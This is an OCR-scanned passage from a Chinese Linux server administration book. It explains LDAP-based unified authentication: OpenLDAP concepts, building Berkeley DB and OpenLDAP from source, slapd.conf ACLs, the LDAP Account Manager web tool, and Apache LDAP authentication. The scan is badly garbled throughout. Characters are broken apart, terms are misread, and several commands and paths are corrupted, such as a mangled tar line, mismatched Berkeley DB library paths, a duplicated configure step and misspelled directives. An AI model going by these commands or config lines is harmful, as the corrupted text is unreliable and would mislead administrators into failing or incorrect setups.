/chnamed 作为 实际 的 根 目录 ， 即 使 named 有 某 种 安全 漏洞 被 人 攻破 ， 也 只 能 访问 到 该 目录 为 
止 。BIND 9 还 新 增 了 很 多 关于 安全 性 的 设 定 项 ， 读 者 可 以 根据 需要 自行 设 定 ， 限 于 篇 幅 这 里 
不 再 详 述 。 
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2.1 Linux 下 LDAP 统一 认证 的 实现 


企业 内 部 需要 认证 的 服务 很 多 , 员工 需要 记 住 很 多 的 密码 , 即使 对 这 些 服务 进行 相同 的 密 
码 设置 ， 也 存在 很 大 的 安全 隐患 。 笔 者 目前 工作 的 企业 就 是 如 此 ， 每 增加 一 个 新 员工 ， 管 理 员 
都 要 初始 化 很 多 的 密码 ， 而 这 些 密码 都 被 设置 成 了 888888 等 弱 密码 ， 由 于 各 种 软件 的 认证 机 
制 之 间 没 有 使 用 一 个 统一 的 标准 , 员工 无 法 一 次 性 修改 所 有 服务 的 密码 , 导致 很 多 即使 是 入 职 
很 久 的 员工 都 还 在 使 用 这 个 “众所周知 ”的 密码 。 

另外 一 个 比较 严重 的 问题 出 现在 公司 增加 内 部 服务 的 时 候 , 例如 领导 要 在 公司 内 部 提供 邮 
件 服务 或 把 现 有 的 ProFTPD 换 成 更 高 效 的 VSFTPD 时 ， 管 理 员 需要 重新 为 所 有 的 员工 初始 化 
新 的 账户 信息 ， 对 于 有 上 千 名 员工 的 企业 来 说 这 将 是 一 个 “灾难 ”。 

如 果 可 以 为 各 种 软件 提供 一 个 标准 的 认证 机 制 ,所 有 软件 就 可 以 不 再 用 独 有 的 用 户 管 理 方 
法 ， 而 是 通过 这 种 统一 的 认证 机 制 进行 用 户 认 证 ， 这 样 就 解决 了 目前 很 多 企业 遇 到 的 问题 。 
LDAP 正 是 这 样 一 种 标准 的 协议 ，LDAP 的 历史 可 以 追溯 到 1988 年 ， 之 后 诞生 的 很 多 软件 基 
本 上 都 支持 这 个 协议 ， 近 年 来 ， 随 着 企业 对 LDAP 需求 的 不 断 增 加 ， 绝 大 多 数 有 认证 机 制 的 
软件 都 会 首先 提供 对 LDAP 的 支持 。 下 面 将 介绍 通过 LDAP 进行 统一 身份 认证 的 方法 ， 以 简 
化 复杂 的 管理 过 程 。 


2.1.1 LDAP 概述 


LDAP 是 Light weight Directory Access Protocol ( 轻 量 级 目录 访问 协议 ) 的 缩写 ， 其 前 身 
是 更 为 古老 的 DAP 协议 。 基 于 X. 500 标准 的 , 但 是 很 简单 , 并且 可 以 根据 需要 定制 。 与 X.500 
不 同 , LDAP 支持 TCP/PP, 这 对 访问 Internet 是 必须 的 。LDAP 的 核心 规范 在 RFC 中 都 有 定义 ， 
大 体 上 讲 , LDAP 协议 定义 了 和 后 台数 据 库 通信 的 方法 、 客 户 端 软件 和 LDAP 协议 之 间 的 通信 
标准 ， 如 图 2.1 所 示 〈 更 详细 的 说 明 可 以 参见 相关 的 RFC 文档 ) 。 
在 图 2.1 中 , LDAP Client 是 指 各 种 需要 身份 认证 的 软件 , 例如 Apache、ProFTPD 和 Samba 
等 。LDAP Sever 指 的 是 实现 LDAP 协议 的 软件 ， 例 如 OpenLDAP 等 。DataStorage 指 的 是 
OpenLDAP 的 数据 存储 ， 如 关系 型 数据 库 (MySQL) 或 查询 效率 更 高 的 嵌入 式 数 据 库 
(BerkeleyDB) ， 甚 至 是 平面 文本 数据 库 (一 个 TXT 的 文本 文件 ) 。 可 见 ，OpenLDAP 软件 
只 是 LDAP 协议 的 一 种 实现 形式 ， 并 不 包括 后 台数 据 库存 储 。 但 在 很 多 时 候 管理 员 经 常 将 
LDAPServer 和 DataStorage 放 在 同一 台 服 务 器 中 , 这样 就 产生 了 人 们 通常 所 说 的 “LDAP 数据 
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库 ”。 虽然 后 台数 据 库 可 以 多 种 多 样 , 但 LDAP 协议 还 规定 了 数据 的 存储 方式 。 LDAP 数据 库 
是 树 状 结构 ， 与 DNS 类 似 ， 如 图 2.2 所 示 。 


dc=org 


dc=syroldmanor 
‘rr | 
LDAP chen LDAP Server 
i 
uid-tsyroid 
图 2.1 客户 端 和 LDAP Server 的 关系 图 2.2 跨国 公司 员工 信息 的 树 状 逻 辑 结构 


在 图 2.2 中 ， 以 这 种 方式 存储 数据 最 大 的 一 个 好 处 就 是 查询 速度 快 ，LDAP 数据 库 专 门 对 
读 操 作 进 行 了 优化 ，OpenLDAP 配合 Berkeley DB 可 使 其 读 操作 的 效率 得 到 很 大 提高 。LDAP 
数据 库 的 树 状 结构 的 另 一 个 好 处 是 便于 分 布 式 的 管理 ， 有 关 这 方面 的 内 容 将 在 后 面 有 所 介绍 。 


2.1.2 ”实现 思路 


统一 身份 认证 主要 是 改变 原 有 的 认证 策略 ,使 需要 认证 的 软件 都 通过 LDAP 进行 认证 ， 
如 图 2.3 所 示 。 在 统一 身份 认证 之 后 ， 用 户 的 所 有 信息 都 存储 在 LDAP Server 中 。 终 端 用 户 在 
需要 使 用 公司 内 部 服务 的 时 候 都 需要 通过 LDAP 服务 器 的 认证 。 每 个 员工 只 需 记 住 一 个 密码 ， 
在 需要 修改 用 户 信息 的 时 候 ， 可 以 通过 管理 员 提 供 的 Web 界面 直接 修改 LDAP Server 中 的 信 
息 。 


图 2.3 通过 LDAP 论证 


目前 大 部 分 主流 软件 都 对 LDAP 有 很 好 地 支持 ， 但 由 于 各 种 软件 对 LDAP 的 支持 程度 不 
同 ， 在 做 实施 的 时 候 也 要 区 别 对 待 。 软 件 对 LDAP 的 支持 可 以 分 为 两 大 类 : 
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@ 一 类 是 完全 支持 ， 也 就 是 在 软件 的 配置 文件 中 加 入 和 LDAP 有 关 的 选项 就 可 以 完成 。 
这 种 方式 的 好 处 是 不 需要 借助 其 他 的 工具 或 软件 ， 由 软件 的 开发 团队 直接 完成 对 
LDAP 的 支持 。 可 能 的 缺陷 也 在 这 里 ， 由 于 各 个 软件 开发 团队 的 水 平和 开发 者 经 验 有 
所 差异 ， 虽 然 同样 是 支持 了 LDAP， 但 稍微 复杂 一 些 的 高 级 功能 就 无 法 提供 ， 有 的 时 
候 甚至 出 现 运行 错误 ， 导 致 整个 软件 出 现 问题 。 笔 者 曾 遇 到 过 一 个 基于 Web 的 CVS 
浏览 软件 ， 安 装 文档 中 说 明了 支持 LDAP， 但 实际 使 用 中 遇 到 了 很 多 问题 导致 整个 软 
件 Crash。 一 些 比较 主流 的 软件 ， 例 如 Apache 2. 义 对 LDAP 的 支持 已 经 近乎 完美 。 

@ 另 一 类 软件 由 于 很 多 原因 并 不 直接 支持 LDAP, 而 是 通过 PAM 做 身份 认证 ,由 于 PAM 
本 身 支持 LDAP， 这 样 也 同样 可 以 实现 使 用 LDAP 做 身份 认证 。 这 种 方式 对 LDAP 的 
支持 同样 有 其 优势 ， 软 件 开 发 人 员 不 需要 修改 代码 支持 的 LDAP 协议 ， 减 少 了 软件 本 
身 产生 安全 漏洞 的 可 能 。 缺 点 是 在 一 些 不 希望 使 用 PAM 的 系统 中 这 样 的 软件 就 无 法 
通过 LDAP 进行 用 户 认 证 , 而 且 虽 然 PAM 对 LDAP 的 支持 已 经 很 完善 ,但 一 些 高 级 、 
复杂 的 功能 还 是 无 法 实现 。 正 是 由 于 这 些 原因 ， 这 类 软件 为 数 不 多 ， 比 较 典型 的 就 是 
VSFTPD 和 CVS。 


2.1.3 使 用 LDAP 做 身份 认证 


介绍 到 这 里 可 能 很 多 读者 会 问 为 什么 需要 使 用 LDAP 数据 库 ? 用 传统 的 关系 型 数据 库 不 
可 以 吗 ? 从 上 述说 明 中 可 以 看 到 LDAP 服务 器 就 是 起 到 了 一 个 认证 Server 的 作用 ， 从 技术 本 身 
而 言 这 个 认证 Server 具体 使 用 的 是 何 种 数据 库 并 不 重要 ， 如 果 使 用 一 个 关系 型 数据 库 也 可 以 
达到 统一 身份 认证 的 目的 ， 但 LDAP 自身 的 优势 使 得 很 多 公司 最 终 选择 了 它 。 以 下 笔者 列举 
了 一 些 选 择 LDAP 的 重要 原因 : 


@ LDAP 是 一 个 开放 的 标准 协议 ， 不同 于 SQL 数据 库 ，LDAP 的 客户 端 是 跨 平 台 的， 并 
且 对 几乎 所 有 的 程序 语言 都 有 标准 的 API 接口 。 即 使 改变 了 LDAP 数据 库 产品 的 提供 
厂商 ， 开 发 人 员 也 不 用 担心 需要 修改 程序 才能 适应 新 的 数据 库 产 品 。 这 个 优势 是 使 用 
SQL 语言 进行 查询 的 关系 型 数据 库 难 以 达到 的 。 

@ 由 于 LDAP 数据 库 的 数据 存储 是 树 状 结构 ， 整 棵 树 的 任何 一 个 分 支 都 可 以 单独 放 在 服 
务 器 中 进行 分 布 式 管理 ， 不 仅 有 利于 做 服务 器 的 负载 均衡 ， 还 方便 跨 地 域 的 服务 器 部 
署 。 这 个 优势 在 查询 负载 大 或 企业 在 不 同 地 域 都 设 有 分 公司 的 时 候 尤为 明显 。 

@ LDAP 支持 强 认证 方式 ,可 以 达到 很 高 的 安全 级 别 。 在 国际 化 方面 ,LDAP 使 用 了 UTF-8 
编码 来 存储 各 种 语言 的 字符 。 

@ 更 灵活 地 添加 数据 类 型 ，LDAP 是 根据 Schema 的 内 容 定义 各 种 属性 之 间 的 从 属 关 系 
及 匹配 模式 。 例 如 在 关系 型 数据 库 中 如 果 要 为 用 户 增加 一 个 属性 ， 就 要 在 用 户 表 中 增 
加 一 个 字段 ， 这 在 拥有 庞大 数量 用 户 的 情况 下 是 十 分 困难 的 ， 需 要 改变 表 结 构 。 但 
LDAP 只 需要 在 Schema 中 加 入 新 的 属性 ， 不 会 由 于 用 户 的 属性 增多 而 影响 查询 性 能 。 

@ LDAP 数据 库 是 对 读 操作 进行 优化 的 一 种 数据 库 ， 在 读 写 比 例 大 于 7 比 1 的 情况 下 ， 
LDAP 会 体现 出 极 高 的 性 能 。 这 个 特性 正 适合 了 身份 认证 的 需要 。 
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注意 : 在 LDAP 中 的 模式 (schema) 是 属性 类 型 以 及 对 象 的 一 系列 信息 集合 ， 服 务 器 用 
这 些 信 息 来 决定 如 何 让 属性 值 去 匹配 ， 它 属于 核心 地 位 ， 客 户 使 用 模式 作为 LDAP 的 语法 ， 
但 这 不 是 随便 就 能 实现 的 ， 在 设计 schema 时 要 考虑 的 安全 性 也 就 是 LDAP 的 安全 性 能 ， 对 于 
LDAP 来 讲 ， 人 允许 根据 需要 使 用 ACL (访问 控制 列表 ) 控制 对 数据 读 、 写 的 权限 ， 对 于 版 本 
的 选择 也 重要 ， 有 的 版 本 就 不 支持 传输 数据 加 密 。 

目前 ， 很 多 公司 都 把 LDAP 和 自己 的 产品 、 技 术 结 合 在 一 起 ， 增 加 了 LDAP 在 各 个 领域 
中 的 有 效 性 ， 这 一 切 都 来 源 于 LDAP 是 一 个 开放 的 协议 ， 很 容易 和 其 他 标准 协议 共存 。 


2.1.4 ”LDAP 版 本 的 选择 


由 于 LDAP v2 相 比 v3 在 LDAP 中 增加 了 使 用 SAsL 增强 认证 ， 通 过 TLS (SSL) 增加 完 
整 性 和 安全 性 保护 以 及 使 用 国际 标准 的 统一 编码 这 三 个 主要 特点 ， 所 以 目前 所 使 用 的 都 是 
LDAP v3 这 一 版 本 。 


2.1.5 ”LDAP 软件 的 选择 


目前 ， 几 乎 所 有 大 的 IT 厂商 都 有 自己 商用 的 LDAP 产品 ， 每 个 三 商 的 LDAP 产品 都 有 其 

特点 , 现在 已 经 有 了 许多 基于 LDAP 协议 开发 出 的 资源 管理 系统 和 工具 , 如 OpenLDAP、NDS 

(Novell Directory Service) 和 ADS (Active Directory Service) 等 。 它 们 已 经 逐渐 地 被 使 用 在 
各 个 需要 目录 服务 的 领域 ， 并 且 应 用 的 趋势 在 增强 。 

OpenLDAP 是 Michjgan 大 学 发 布 的 免费 软件 ， 实 现 了 LDAP v2、LDAP v3 的 功能 并 且 提 
供 源 代码 ， 可 以 在 大 多 数 的 Unix 和 Linux 系统 中 安装 。OpenLDAP 与 其 他 的 商用 软件 相 比 有 
很 多 优势 ， 如 商用 软件 版 本 更 新 很 慢 、 对 Bug 的 反应 速度 比 开 源 软件 差 许多 ，OpenLDAP 还 
包含 了 很 多 有 创造 性 的 新 功能 ， 能 满足 大 多 数 使 用 者 的 要 求 。 笔 者 曾 使 用 过 许多 商用 LDAP 
产品 ，OpenLDAP 是 其 中 最 轻便 且 消 耗 系统 资源 最 少 的 一 个 。 

OpenLDAP 是 开源 软件 ， 近 年 来 国内 很 多 公司 开发 的 LDAP 产品 都 是 基于 OpenLDAP 开 
发 。 开 发 者 能 够 直接 利用 它 所 附带 的 Shell 工具 开发 应 用 。 这 些 Shell 包括 了 查询 (ldapsearch) 、 
修改 (ldapmodify) 、 删 除 (ldapdelete》、 增 加 (ldapadd) 等 ， 也 可 以 调用 它 提供 的 API 来 开 
发 应 用 。 本 章 重点 介绍 开源 的 OpenLDAP 软件 。 


2.1.6 OpenLDAP 的 安装 和 配置 


在 RedHat Linux、Suse Linux 等 发 行 版 中 都 很 好 地 继承 了 OpenLDAP， 如 果 在 系统 安装 时 
已 经 把 OpenLDAP 安装 上 了 ， 就 可 以 跳 过 这 部 分 直接 进行 配置 和 使 用 。 和 否则， 通过 发 行 版 的 
安装 光盘 来 安装 , 在 基本 系统 中 选取 目录 服务 客户 端 中 的 openldap-clients-2.4.23 选项 , 并 选中 
服务 器 列表 中 目录 服务 器 的 openldap-servers-2.4-23 选项 ， 如 图 2.4 所 示 。 
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图 2.4 在 基本 系统 中 选择 相应 的 选项 


接着 介绍 源 代 码 的 安装 。 首 先 OpenLDAP 的 源 


代码 可 以 到 官方 网 站 


(http://www.openldap.org) 上 下 载 ， 安 装 过 程 也 很 简单 ， 操 作 步 骤 如 下 : 


OpenLDAP 可 以 采用 多 种 数据 库 作 为 后 台 ， 包 括 Berkeley DB 
等 ， 这 里 选用 Berkeley DB， 由 于 OpenLDAP 需要 Berkeley DB 


、GDBM、 MySQL、Oracle 


Berkeley DB 5.2.36 (http://ftp.isu.edu.tw/pub/FreeBSD/distfiles/bdb/db-5.2.36.tar.gz， 大 小 约 
33MB) 。Berkeley DB 是 高 性 能 的 、 嵌 入 数据 库 编 程 库 ， 它 是 由 美国 Sleepycat Software 公司 


开发 的 一 套 开放 源码 的 嵌入 式 数据 库 的 程序 库 〈database library) 


， 它 为 应 用 程序 提供 可 伸缩 


的 、 高 性 能 的 、 有 事务 保护 功能 的 数据 管理 服务 ， 有 时 也 简称 为 BDB。Berkeley DB 的 设计 思 
想 简单 而 精巧 ， 数 据 库 中 包含 若干 记录 ， 每 个 记录 由 Key-Value 组 成 ，Value 可 以 是 简单 的 数 


据 类 型 ， 也 可 以 是 复杂 的 数据 类 型 ， 这 完全 由 客户 端 自己 自行 处 理 


。 虽 然 Berkeley DB 数据 库 


精 小 ， 却 能 管理 大 至 256TB 的 数据 ， 彰 显 了 Key-Value“ 四 两 拨 千 斤 ” 的 致胜 大 招 。 下 面 介绍 


如 何 操 作 ， 首 先 解压 db-5.2.36.tar.gz: 
tar er dbr i 3 tar ga 


解压 后 ， 会 生成 db-5.2.36 目录 ， 进 入 该 目录 下 的 build_unix 
置 安装 : 

#cd db-5.2.36/build unix 

#../dist/configure 

# ./configure 


# make 
#vi /etc/ld.conf 


加 入 : 


/usr/local/Berkele/DB5.2.36/1ib 
#/sbin/ldconfig 


然后 下 载 OpenLDAP， 并 解压 、 安 装 : 


目录 。 执 行 以 下 命令 进行 配 
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# 上 tar -zxvf openldap-stable- 20100719.tgz 
解压 完成 后 ， 还 会 生成 一 个 openldap 目录 ， 进 入 该 目录 ， 执 行 以 下 命令 进行 配置 安装 : 


#env CPPFLAGS="-I/usr/local/BerkeleyDB.5.2/include" LDFLAGS="-L/usr/local/ 
BerkeleyDB.5.2/lib" ./configure -prefix=/usr/local/openldap --enable-ldbm 


注意 以 上 配置 语句 , 需要 设置 资料 库 的 include 和 lib 路径 , 否则 在 配置 到 资料 库 相 关内 容 
时 ， 会 提示 Berkeley DB 版 本 不 兼容 并 中 断 配置 。 如 果 没 有 --enable-ldbm 选项 ， 再 进行 以 下 
make test 时 会 提示 ldbm 找 不 到 : 


#make depend 
#make 
#make test 


在 make test 阶段 要 花费 较 长 时 间 进 行 测 试 ， 根 据 版 本 的 差异 有 十 多 项 内 容 。 你 可 以 放松 
一 下 ， 这 个 时 间 应 该 是 最 紧张 的 了 。 


#make install 


通过 以 上 配置 命令 可 以 看 出 ， 已 经 把 OpenLDAP 安装 到 /usr/local/openldap 目录 下 。 建 议 
以 源 代码 安装 的 软件 都 放 到 独立 的 目录 下 ,不 要 放 到 软件 默认 的 目录 。 好 处 是 方便 管理 和 控制 ， 
所 有 文件 在 统一 的 目录 下 ， 和 名 载 软件 时 只 要 删除 整个 目录 就 可 以 了 。 

需要 注意 如 下 几 个 地 方 : 


@ 在 执行 Configure 之 前 要 确定 安装 了 Berkeley DB, 虽然 OpenLDAP 可 以 使 用 很 多 数据 
库 做 back-end， 但 Berkeley DB 仍然 是 OpenLDAP 开发 团队 强烈 推荐 的 。 

@ 如 果 需 要 更 安全 的 方式 访问 OpenLDAP， 在 配置 执行 Configure 之 前 要 确定 已 经 安装 
了 cyrus-sasl。 

@ 有 些 用 户 在 安装 OpenLDAP 的 时 候 忽略 了 最 后 的 make test, 经 验 告 诉 我 们 , 很 多 的 错 
误 都 会 在 执行 make test 的 过 程 中 暴露 出 来 , OpenLDAP 的 开发 团队 很 注意 维护 软件 的 
Test Case， 整 个 测试 非常 全 面 ， 很 多 在 日 常 使 用 中 很 少 用 到 的 功能 都 会 被 测试 到 ， 很 
好 地 保证 了 软件 在 投入 生产 以 后 的 稳定 性 。 


检查 安装 结果 ， 在 系统 安装 好 以 后 ， 会 自动 产生 多 个 .schema 文件 : 


#/usr/local/openldap/etc/openldap/schema/*.schema 
启动 opendap: 


#/usr/local/openldap/libexec/slapd 
检查 命令 #/usr/local/libexec/slapd d 256 或 slapd d -1 


默认 情况 下 ，OpenLDAP 的 配置 文件 保存 在 /etc/openldap、slapd.conf 中 ,配置 文件 中 记录 
着 OpenLDAP 的 管理 员 密码 。 默 认 情 况 下 密码 是 用 明文 表示 的 ， 可 以 用 slappasswd 命令 产生 
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密 文 来 蔡 换 配 置 文件 中 的 明文 。 以 图 2.3 为 例 ， 配 置 文件 的 相关 项 应 做 如 下 更 改 : 


suffix "dc=site,dc=org" 
rootdn "cn=manager,dc=ldap abc,dc=org" 


directory /usr/local/var/openldap-data 
其 中 directory 参数 为 数据 文件 在 服务 器 上 的 位 置 ， 出 于 稳定 性 和 性 能 方面 的 考虑 ， 数 据 


文件 最 好 放 在 独立 的 分 区 或 磁盘 阵列 上 。 配 置 文件 的 ACL 部 分 也 十 分 重要 ， 很 多 读 取 或 修改 
操作 不 能 正常 完成 都 是 由 于 ACL 的 写法 错误 造成 的 。 下 面 是 默认 情况 下 ACL 部 分 的 配置 : 


Access to attrs=userPassword 
By self write 

By * auth 

Access to * 


By * read 


2.1.7 ”轻松 搞定 LDAP 账号 管理 


下 面 将 介绍 使 用 PHP 语言 开发 基于 Web 的 LDAP 管理 器 , 并 着 重 分 析 该 管理 器 中 类 属性 
与 对 象 类 的 继承 关系 、 修 改过 程 的 递归 关系 时 所 用 到 的 相关 技术 及 相关 算法 , 使 得 在 使 用 和 管 
理 LTDAP 账号 等 方面 变 得 更 为 简便 。 

LDAP Account Manager (LAM) 采用 PHP 4/5 编写 , 是 基于 Web 的 LDAP 用 户 、 用 户 组 、 
主机 和 LDAP 目录 的 管理 系统 , 管理 员 可 以 通过 加 密 的 方式 进行 操作 , 增强 了 安全 性 .LAM 支 
持 管 理 的 账号 类 型 有 Samba 2/3、Unix 地 址 簿 接口 和 计算 机 管理 需要 的 信息 ， 包 括 NIS 映射 、 
E-mail 假名 、MAC 地 址 等 。 


1. LDAP Account Manager 的 强大 功能 ( 正式 版 4.3 已 发 布 ) 


@ 使 用 LAM, 可 以 通过 Web 接口 较为 直观 地 、 简便 地 管理 存储 在 LDAP 目录 里 的 用 户 、 
用 户 组 和 计算 机 系统 账户 。 

管理 Unix 的 用 户 、 用 户 组 、 主 机 和 域名 。 

强大 的 过 滤 和 排序 功能 

账号 属性 管理 。 

多 构造 属性 。 

直观 树 状 查看 模式 。 

计划 查看 模式 。 

开放 式 的 编辑 器 。 

通过 文件 上 传 创建 账号 。 

所 有 账号 可 导出 为 PDF 文件 格式 。 

管理 用 户 、 用 户 组 、 配 额 和 自动 创建 ， 删 除 用 户 的 Home 目录 。 
支持 LDAP+SSL 加 密 模 式 。 
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多 国语 言 支 持 ， 如 Catalan、Chinese ( Traditional )、Dutch、English、French、German、 
Hungarian、Ttalian、Japanese 和 Spanish 等 。 


安装 需求 

PHP5 语言 环境 和 Perl 语言 环境 。 

OpenLDAP 2. 0 或 更 高 版 本 。 

支持 CSS 的 网 页 浏览 器 。 

Apache WebServer, 建议 安装 SSL、 PHP-Module(PHP-Module with ldap、 gettext、 XML、 
mcrypttmhash ) 等 模块 。 


安装 和 使 用 


首先 从 http://lam.sourceforge.net/ 下 载 LAM 压缩 包 ， 然 后 解压 缩 并 修改 PHP 的 配置 文件 
php.ini。 内 容 如 下 : 


* memory limit=64M 


接 下 来 复制 文件 到 Web 服务 器 的 html-file 目录 中 去 ， 如 apache、htdocs， 为 文件 设置 合 
适 的 读 写 权限 。 


然后 配置 conflg.cfg 文件 ， 创 建 一 个 配置 属性 ， 并 设置 密码 ， 复 制 config.cfg 到 配置 目录 。 


-lam/sess: 给 Apache 用 户 设 置 写 权限 。 

-lam/tmp: 给 Apache 用 户 设置 写 权限 。 

-lam/config ( 包括 子 目 录 ) 给 Apache 用 户 设置 写 权限 。 
-lam/lib lamdaemon.pl: 必须 设置 为 可 执行 权限 。 


最 后 ， 在 浏览 器 中 打开 index.html， 在 Configuration Login 中 可 以 使 用 默认 密码 lan 登录 ， 进 
行 相关 操作 ， 如 图 2.5 所 示 。 


LDAP Acco Manager 


Enter Usemame and Password for Account 


Usemame: [am 可 
Paseword Pr 
Your Language: [Enh (arcotortem) 可 


Login 


LDAP server lccabest 
Cenmguraton proflle: em 


图 2.5 LAM 登录 界面 
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4. 配置 管理 LAM 


成 功 登录 进入 LAM 系统 后 ， 使 用 网 页 的 形式 对 LDAP 进行 管理 就 变 得 十 分 直观 和 简单 
了 ， 通过 鼠标 点 击 就 可 以 轻松 查看 和 管理 LDAP， 还 可 以 在 线 编辑 和 导出 数据 。 在 LAM 系统 
中 ， 主 要 可 以 进行 如 下 的 操作 。 


@ LAM 系统 配置 : LAM 的 具体 配置 如 图 2.6 所 示 。 


LDAP Accc Manager 


Samba 3x schema: [755 =] Help 


图 2.6 LAM 系统 配置 
@ LAM 的 模块 选择 和 管理 : 让 LAM 列 出 用 户 信息 。 
@ 修改 用 户 信息 : 在 LAM 中 查看 和 修改 用 户 属性 ， 如 图 2.7 所 示 。 


种 Treevew 总 User 卉 Groups 要 Hosts 。 电 Semba domains ”证 Mallalases 
New group | Dalete groupls) | suroc [ae=demoou=9goupo=iesc=de 了 Change sdf | SY change setings 
Befresh | Soreunls)found 和 
© Wa FE Es EE | Be 
FA ladmins 10619 smuber aamiristrators 
| Ra computers 10620 Computer accourts 
厂 | Rah peaders 10818 |ebaeckar fmantag Jproject Leaders 
| A project! 10815 hmeae JProject 
FAD projentz 061 echer ehouser Tmortag eaz 
厂 | 于 司 夫 。jproject3 106817 Tachuster thauser Prolert3 
tSelect all 
nefresh | Soroupls) found 1 
New group | Delete groupls) | Surtoe [ou domo pur groupotoserds 7] charge sufin | Sh change setings 


2.7 ”查看 和 修改 用 户 属性 


不 仅 如 此 , LAM 的 管理 功能 十 分 全 面 ， 还 可 以 对 用 户 进 行 很 多 操作 , 如 列 出 用 户 组 信息 、 
列 出 所 管理 的 服务 器 主机 信息 、 通 过 文件 上 传 方式 创建 用 户 、 树 状 查 看 方式 、Samba SAM 信 
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息 查看 修改 、 开 放 式 在 线 编辑 模式 和 LDAP 信息 PDF 文件 格式 输出 等 ， 对 于 系统 管理 员 来 说 
实在 是 太 方便 了 。 


2.1.8 配置 Apache 支持 LDAP 


各 种 软件 支持 LDAP 的 方法 分 为 两 种 ， 一 些 软件 希望 自主 开发 对 LDAP 的 支持 方法 ， 
另 一 些 软件 使 用 PAM 已 经 开发 好 的 LDAP 支持 。 任 何 一 个 软件 要 通过 LDAP 做 用 户 认 证 
至 少 要 在 软件 的 配置 文件 中 提供 两 个 认证 所 需要 的 信息 : 一 个 是 LDAP 服务 器 的 IP 地址; 
另 一 个 是 需要 认证 用 户 在 LDAP 数据 库 中 的 位 置 。 前 面 提 到 过 LDAP 数据 库 是 和 DNS 类 
似 的 树 状 结构 ， 每 个 用 户 作为 叶子 节点 被 放置 在 这 棵 树 上 ， 而 这 些 用 户 的 父 节点 就 是 认证 
所 要 提供 的 用 户 在 LDAP 数据 库 中 的 位 置 。 如 图 2.8 所 示 ， 如 果 要 给 亚洲 地 区 市 场 部 的 所 
有 员工 提供 FTP 登录 账号 ， 需 要 提供 的 用 户 在 LDAP 数据 库 中 的 位 置 就 是 : “ou=Sales， 
I=Asia，o=ldap_abc. org”。 下 面 以 Apache 为 例 介绍 一 下 软件 的 配置 。 

Apache 和 LDAP 整合 可 以 用 来 限制 用 户 以 HTTP 方式 访问 文件 的 权限 ，Apache 使 用 
LDAP 做 用 户 认证 有 很 多 现实 意义 , 首先 可 以 限制 用 户 对 公司 内 部 HTTP 敏感 内 容 的 访问 ; 
此 外 ， 很 多 版 本 的 管理 软件 (如 Subversion) 都 提供 了 LDAP 支持 ， 这 样 在 用 户 需要 通过 
Web 方式 访问 文件 的 时 候 可 以 通过 Apache 的 设置 来 限制 用 户 对 文件 的 访问 权限 。Apache 
是 从 2.0.41 以 后 才 开 始 支持 LDAP 的 ， 如 果 和 希望 使 用 LDAP 做 身份 认证 就 要 安装 Apache 
2.0.41 以 上 的 版 本 ， 企 业 版 本 的 Red Hat AS 3/4/5 默认 安装 的 Apache 2.x 就 已 经 把 LDAP 
相关 的 模块 进行 了 编译 ， 用 户 只 需 正 确 修改 Apache 的 配置 文件 就 可 以 支持 LDAP 认证 。 

以 下 配置 信息 对 保护 目录 /var/www/htm/internal 设置 了 一 定 权 限 ( 注 意 ，SUSE 通常 将 
Web 页 面 存储 在 /srv/www/htdocs 目录 下 ) : 


<Directory /var/www/html/internal> 

AuthName "WeIcome to Linux" 

AuthLDAPEnNabled on 

AuthLDAPURL ldap://192.168.1.2/0u=Sales, I=Asia,o=ldap abc.org?uid 
Require valid-user 


</Directory> 
上 面 配置 信息 中 各 项 内 容 说 明 如 下 : 


@ AuthName 是 可 选项 ， 用 户 在 访问 受 保护 目录 的 时 候 浏览 器 会 弹出 一 个 提示 窗口 ， 要 
求 输入 用 户 名 和 密码 ，AuthName 设置 的 内 容 会 出 现在 弹出 窗口 的 标题 栏 (此 项 内 容 
支持 中 文 )。 

@ AuthLDAPEnabled 是 可 选项 ， 默 认 值 为 on。 当 已 经 把 目录 /var/www/htm/intemal 设置 
为 需要 认证 , 但 又 需要 将 var/www/htm/internal/pub 目录 设置 为 公开 ， 就 可 以 将 此 项 设 
置 成 off。 

@ AuthLDAPURL 为 必 填 项 , 192. 168. 1.2 即 为 LDAP 服 务 器 的 他 地 址 ,ou=Sales,I=Asia, 
o=ldap_abc. org 为 用 户 在 LDAP 数据 库 中 的 位 置 ，uid 表示 使 用 每 个 用 户 uid 属性 的 值 
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作为 认证 过 程 中 使 用 的 用 户 名 。 
@ Require valid-user 表示 只 有 认证 成 功 的 用 户 才能 访问 指定 的 资源 。 


下 面 用 一 个 实际 的 案例 简单 介绍 LDAP 树 状 结构 的 设计 : 某 上 百人 的 IT 企业， 总 公司 设 
在 北京 ， 且 在 上 海 、 广 州 设 有 分 部 ， 公 司 的 市 场 部 、 开 发 部 、 管 理 部 及 人 力 资 源 部 在 三 个 城市 
都 有 分 部 , 公司 要 求 所 有 员工 每 天 更 新 自己 在 这 一 天 内 的 工作 成 果 , 并 为 每 个 员工 设 有 企业 内 
部 的 FTP 共享 空间 ， 程 序 开发 人 员 使 用 CVS 提交 代码 ， 公 司 内 部 有 多 台 Linux 服务 器 ， 只 人 允 
许 有 权限 的 账号 登录 。 

员工 使 用 上 述 服 务 的 时 候 需 要 进行 身份 认证 。 在 这 样 的 情况 下 , 既 可 以 选择 购买 几 台 昂贵 
的 数据 库 服务 器 ， 装 上 大 型 的 商业 数据 库 来 解决 这 个 问题 ， 也 可 以 选择 更 廉价 且 高 效 的 办 法 
一 一 使 用 开源 软件 的 解决 方案 。 首先 要 考虑 的 是 数据 的 拓扑 , 根据 企业 的 需要 做 数据 库 设 计 是 
关键 。 公 司 在 北京 、 上 海 和 广州 设 有 分 公司 ， 如 果 数 据 库 服务 器 只 存放 在 一 个 城市 ， 在 网 络 流 
量 高 峰 期 会 影响 认证 速度 ， 降 低 员工 的 工作 效率 。 因 此 数据 库 设计 可 以 有 以 下 两 种 方案 : 

一 种 是 把 主 LDAP 服务 器 设置 在 北京 ,同时 在 上 海 和 广州 设置 LDAP 服务 器 , 类似 于 DNS 
的 区 域 授权 ， 总 公司 把 上 海 和 广州 员工 的 管理 下 放 ， 各 地 的 员工 通过 本 地 的 LDAP 服务 器 进 
行 认证 ， 既 提高 了 效率 ， 又 保证 服务 器 出 现 问题 时 不 会 影响 到 其 他 两 个 城市 的 认证 服务 。 这 种 
数据 库 设计 并 不 是 把 公司 的 所 有 员工 割裂 成 没有 联系 的 三 个 部 分 。 如 图 2.8 所 示 ， 三 台 服 务 器 
上 的 LDAP 分 支 是 在 同一 棵 树 上 通过 类 似 于 “引用 ”的 特殊 属性 连接 在 一 起 ， 三 个 城市 都 由 
